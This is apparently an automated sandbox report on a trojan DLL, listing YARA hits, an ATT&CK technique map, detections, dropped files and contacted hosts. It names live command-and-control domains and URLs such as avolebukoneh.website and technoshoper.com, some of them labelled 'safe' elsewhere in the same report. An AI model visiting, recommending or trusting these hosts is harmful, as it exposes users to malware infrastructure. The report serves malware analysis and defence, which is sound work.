Source: Yara match	File source: 00000002.00000003.1174643571.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174822203.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191409157.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174672667.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174877788.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188941851.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191287733.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191167902.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189311900.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191103742.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174724933.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191264405.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189232893.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191197340.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188897799.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174847210.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189190747.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174861431.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189102105.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191219624.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188997373.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1175009445.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189042017.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.710000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1340000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1204664213.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204064655.00000000006F0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1206945247.0000000004919000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1208151025.0000000004FB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206904709.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204058262.00000000006E0000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1204595185.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206985280.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206433585.0000000001979000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	Process Injection112	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection112	LSASS Memory	Security Software Discovery21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	System Information Discovery12	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2W6FcgEeMy.dll	3%	Virustotal		Browse
2W6FcgEeMy.dll	4%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.regsvr32.exe.2fd0000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.2.loaddll32.exe.1340000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
3.2.rundll32.exe.710000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
3.2.rundll32.exe.6f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
0.2.loaddll32.exe.1100000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://ad-delivery.net/px.gif?ch=1&e=0.5207611127885279	0%	Avira URL Cloud	safe
http://avolebukoneh.website	2%	Virustotal		Browse
http://avolebukoneh.website	0%	Avira URL Cloud	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://www.botman.ninja/privacy-policy	0%	Avira URL Cloud	safe
https://www.queryclick.com/privacy-policy	0%	Avira URL Cloud	safe
http://technoshoper.com	0%	Avira URL Cloud	safe
https://btloader.com/tag?o=6208086025961472&upapi=true	0%	URL Reputation	safe
https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c	0%	Avira URL Cloud	safe
http://avolebukoneh.website/glik/.lwe.bmp088991256473871MNTYA%-	0%	Avira URL Cloud	safe
https://silvermob.com/privacy	0%	Avira URL Cloud	safe
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
http://avolebukoneh.website/glik/.lwe.bmp08899	0%	Avira URL Cloud	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://doceree.com/.well-known/deviceStorage.json	0%	Avira URL Cloud	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://avolebukoneh.website	0%	Avira URL Cloud	safe
http://avolebukoneh.website/glik/.lwe.bmp088991256473871MNTYA	0%	Avira URL Cloud	safe
https://www.stroeer.de/ssp-datenschutz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
contextual.media.net	2.18.160.23	true	false	high
avolebukoneh.website	37.120.206.119	true	false	high
dart.l.doubleclick.net	216.58.215.230	true	false	high
hblg.media.net	2.18.160.23	true	false	high
lg3.media.net	2.18.160.23	true	false	high
technoshoper.com	45.9.20.245	true	false	high
btloader.com	172.67.70.134	true	false	high
ad-delivery.net	172.67.69.19	true	false	high
assets.msn.com	unknown	unknown	false	high
web.vortex.data.msn.com	unknown	unknown	false	high
www.msn.com	unknown	unknown	false	high
ad.doubleclick.net	unknown	unknown	false	high
cvision.media.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ad-delivery.net/px.gif?ch=1&e=0.5207611127885279	false	Avira URL Cloud: safe	unknown
https://btloader.com/tag?o=6208086025961472&upapi=true	false	URL Reputation: safe	unknown
https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/MicrosoftEdgeDownload"	loaddll32.exe, 00000000.00000003.1189379909.0000000001435000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1191310809.00000000009E6000.00000004.00000001.sdmp	false		high
https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d36	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	false		high
http://searchads.msn.net/.cfm?&&kp=1&	{EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/news/other/jacqueline-hofer-tritt-doch-nicht-zur-wiederwahl-an/ar-AAQTAnf?	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/news/other/sie-bew%c3%a4ltigen-alltagsstress-und-todesszenen/ar-AAQUall?oc	de-ch[1].htm.7.dr	false		high
http://avolebukoneh.website	rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/favicon.ico~	imagestore.dat.7.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na	de-ch[1].htm.7.dr	false		high
https://onedrive.live.com;Fotos	52-478955-68ddb2ab[1].js.7.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/sport?ocid=StripeOCID	de-ch[1].htm.7.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.7.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com/de-ch/sport/fussball/der-fcz-zittert-und-steht-doch-ganz-oben/ar-AAQWrxt?ocid=hp	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/news/other/mehrere-tausend-menschen-demonstrieren-in-z%c3%bcrich/ar-AAQWtO	de-ch[1].htm.7.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.7.dr	false		high
https://www.botman.ninja/privacy-policy	iab2Data[2].json.7.dr	false	Avira URL Cloud: safe	unknown
https://outlook.live.com/mail/deeplink/compose;Kalender	52-478955-68ddb2ab[1].js.7.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	{EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	false		high
https://www.queryclick.com/privacy-policy	iab2Data[2].json.7.dr	false	Avira URL Cloud: safe	unknown
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.7.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	52-478955-68ddb2ab[1].js.7.dr	false		high
http://technoshoper.com	loaddll32.exe, 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-st%c3%bcrzt-nach-verfolgungsjagd-mit-der-polize	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-liefert-sich-wilde-verfolgungsjagd-mit-der-poli	de-ch[1].htm.7.dr	false		high
http://www.reddit.com/	msapplication.xml4.5.dr	false		high
https://www.skype.com/	de-ch[1].htm.7.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562	de-ch[1].htm.7.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.7.dr	false		high
https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c	iab2Data[2].json.7.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	52-478955-68ddb2ab[1].js.7.dr	false		high
http://avolebukoneh.website/glik/.lwe.bmp088991256473871MNTYA%-	loaddll32.exe, 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://amzn.to/2TTxhNg	de-ch[1].htm.7.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	52-478955-68ddb2ab[1].js.7.dr	false		high
https://client-s.gateway.messenger.live.com	52-478955-68ddb2ab[1].js.7.dr	false		high
https://secure.adnxs.com/clktrb?id=764680&t=1	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.7.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	52-478955-68ddb2ab[1].js.7.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	{EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.7.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.7.dr	false		high
https://twitter.com/i/notifications;Ich	52-478955-68ddb2ab[1].js.7.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.7.dr	false		high
https://www.google.com/favicon.ico	imagestore.dat.7.dr	false		high
https://nextmillennium.io/privacy-policy/	iab2Data[2].json.7.dr	false		high
https://silvermob.com/privacy	iab2Data[2].json.7.dr	false	Avira URL Cloud: safe	unknown
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.7.dr	false		high
http://www.youtube.com/	msapplication.xml7.5.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.7.dr	false		high
http://schema.org/Organization	loaddll32.exe, 00000000.00000002.1206124177.0000000001423000.00000004.00000020.sdmp	false		high
https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer	de-ch[1].htm.7.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.skype.com/de	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.tippsundtricks.co/lifehacks/schwamm-kuhlschrank/?utm_campaign=DECH-schwamm&utm_sourc	de-ch[1].htm.7.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.7.dr	false		high
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	de-ch[1].htm.7.dr	false	URL Reputation: safe	unknown
https://www.skype.com/de/download-skype	52-478955-68ddb2ab[1].js.7.dr	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.7.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	52-478955-68ddb2ab[1].js.7.dr	false		high
https://onedrive.live.com;OneDrive-App	52-478955-68ddb2ab[1].js.7.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/news/other/bei-den-%c3%a4rzten-schauen-die-beh%c3%b6rden-einfach-weg/ar-AA	de-ch[1].htm.7.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.7.dr	false		high
https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692	de-ch[1].htm.7.dr	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	imagestore.dat.7.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	false		high
http://www.amazon.com/	msapplication.xml.5.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	52-478955-68ddb2ab[1].js.7.dr	false		high
http://avolebukoneh.website/glik/.lwe.bmp08899	rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js	loaddll32.exe, 00000000.00000003.1189532035.0000000001421000.00000004.00000001.sdmp	false		high
http://www.twitter.com/	msapplication.xml5.5.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	52-478955-68ddb2ab[1].js.7.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	false		high
https://clkde.tradedoubler.com/click?p=195119&a=3064090&g=25021476	de-ch[1].htm.7.dr	false		high
https://outlook.com/	de-ch[1].htm.7.dr	false		high
https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"	de-ch[1].htm.7.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	{EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	false		high
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	iab2Data[2].json.7.dr	false	URL Reputation: safe	unknown
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	{EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.7.dr	false		high
https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t	de-ch[1].htm.7.dr	false		high
https://doceree.com/.well-known/deviceStorage.json	iab2Data[2].json.7.dr	false	Avira URL Cloud: safe	unknown
http://www.nytimes.com/	msapplication.xml3.5.dr	false		high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/sport/other/runter-rauf-runter-wie-gc-in-genf-vom-weg-abkommt/ar-AAQYdQe?o	de-ch[1].htm.7.dr	false		high
https://www.bidstack.com/privacy-policy/	iab2Data[2].json.7.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com/de-ch/news/other/defektes-paket-mit-radioaktivem-inhalt-in-swiss-flieger-entdeck	de-ch[1].htm.7.dr	false		high
https://avolebukoneh.website	loaddll32.exe, 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.7.dr	false		high
https://twitter.com/	de-ch[1].htm.7.dr	false		high
http://avolebukoneh.website/glik/.lwe.bmp088991256473871MNTYA	loaddll32.exe, 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://www.stroeer.de/ssp-datenschutz	iab2Data[2].json.7.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.69.19	ad-delivery.net	United States	13335	CLOUDFLARENETUS	false
45.9.20.245	technoshoper.com	Russian Federation	35913	DEDIPATH-LLCUS	false
216.58.215.230	dart.l.doubleclick.net	United States	15169	GOOGLEUS	false
172.67.70.134	btloader.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	526322
Start date:	22.11.2021
Start time:	14:26:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2W6FcgEeMy.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winDLL@17/115@14/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 92.2%) Quality average: 81.3% Quality standard deviation: 30.3%
HCA Information:	Successful, ratio: 67% Number of executed functions: 16 Number of non-executed functions: 51
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.70.208, 204.79.197.203, 131.253.33.200, 13.107.22.200, 80.67.82.240, 80.67.82.209, 65.55.44.109, 152.199.19.161, 23.11.206.43, 23.11.206.74, 23.11.206.17, 2.18.160.23, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 23.211.5.92 Excluded domains from analysis (whitelisted): e13678.dscb.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, microsoft.com, www.microsoft.com, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:30:56	API Interceptor	3x Sleep call for process: regsvr32.exe modified
14:30:56	API Interceptor	2x Sleep call for process: loaddll32.exe modified
14:31:19	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	139
Entropy (8bit):	5.196269394173945
Encrypted:	false
SSDEEP:	3:D9yRtFwsx6wmxvFuqLHIfwEYPJGX7T40AAe2OjQHhM9qSm8WLKb:JUFkduqswEkIXH40AAe2OmhMldZb
MD5:	695395C22A6B23F44443EBD45DF94CC2
SHA1:	2A0E22A72AFE7FBA258E94C1E9851ED7C8A45561
SHA-256:	B75348D98E10FF1640EEF96AFC117BCB149AB2DE5FF2BADCC54CF67AA5BAB5FB
SHA-512:	8C693C970D76BEE5ECF99A42C681BDC987AE917D09BF22E87784B59BECCD4861926D654198C289DDE9306E7F671BA1D717CEA8573342D7F788F2800FC99CD6B4
Malicious:	false
Reputation:	unknown
Preview:	<root><item name="BT_AA_DETECTION" value="{"ab":false,"acceptable":true}" ltime="3412130432" htime="30924708" /></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Reputation:	unknown
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{EBFDF002-4B97-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	1.9074093265649457
Encrypted:	false
